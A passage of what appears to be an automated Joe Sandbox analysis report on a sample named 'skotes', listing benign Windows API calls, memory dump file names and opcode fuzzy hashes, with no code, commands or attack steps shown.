                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa29431b252151c1db008626b936a3c7cff0c43f55be1b99f9d99db73f645758
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB51C1719011589BDB28DF28CD95BDDBBB9EB46310F1082D9E409A72C2DB395F84CF91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00AD705B,?,?,00000000,00000000), ref: 00AD7166
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Time$LocalSpecificSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2574697306-0
                                                                                                                                                                                                                                                                • Opcode ID: c82629ad6e211d5b49f4e9d855ce298abbaeb10818056b8f6d4355fe494039f8
                                                                                                                                                                                                                                                                • Instruction ID: fea20c20bea551037191e5ac48b66d06ff3abfab001b71192b63840e943876b8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c82629ad6e211d5b49f4e9d855ce298abbaeb10818056b8f6d4355fe494039f8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E11E87290410DABDB14DFA5C985EDFB7BCAB48310F605366F612E2190FB30EA49CB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                • Opcode ID: 8ffd852c1c70987427ecc70e108f7c3e3c2ac1d40c47cf2395e6dcba76f00811
                                                                                                                                                                                                                                                                • Instruction ID: 6528054a7184cc660d8c1580ce81f613e8841fb8cd1465e59d07b5aa843aedcd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ffd852c1c70987427ecc70e108f7c3e3c2ac1d40c47cf2395e6dcba76f00811
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E111571A0420AAFCF05DF98E941A9B7BF4EF48314F04406AF809AB351DA30EE21CB65
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,61AD01A7,?,?,00ABD3FC,61AD01A7,?,00AB7A8B,?,?,?,?,?,?,00AA7465,?), ref: 00ADB07E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 987170f0b71bfce542e0483d9c37ca936e7e651f7de65ca7a19c8abe942a7a7d
                                                                                                                                                                                                                                                                • Instruction ID: acad58f6bcac79e2d22e4ba0c0940bb0db220bd87783b322ba522bd38b8374b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 987170f0b71bfce542e0483d9c37ca936e7e651f7de65ca7a19c8abe942a7a7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36E06D39161226D6EA3133659D41BAFBA589B427A1F1B1223ED6796790EF20DC0082F1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,00AE1B65,?,?,00000000,?,00AE1B65,00000000,0000000C), ref: 00AE1792
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                • Opcode ID: 5cb97f737d06a98613c1be1d190ebbd2ff21b3843dbbeab68e30a594de755685
                                                                                                                                                                                                                                                                • Instruction ID: 9434e961dc33dd1c8435c82f3d28e6b148efaac28aed5375d975e909f7f249eb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cb97f737d06a98613c1be1d190ebbd2ff21b3843dbbeab68e30a594de755685
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78D0923204010DBFDF129E84DD02EDA3BAAFB48754F015110BE1866020C772FC31AB94
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2938705345.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 36cdcf84a449469db6a7d4527b978e779bfbd7f56a2212588627da0482ead23b
                                                                                                                                                                                                                                                                • Instruction ID: 9a6ce7e9da4b92a379b1afd161cc54e651d3fbd6533c28d4b0d5b048ebb08f0a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36cdcf84a449469db6a7d4527b978e779bfbd7f56a2212588627da0482ead23b
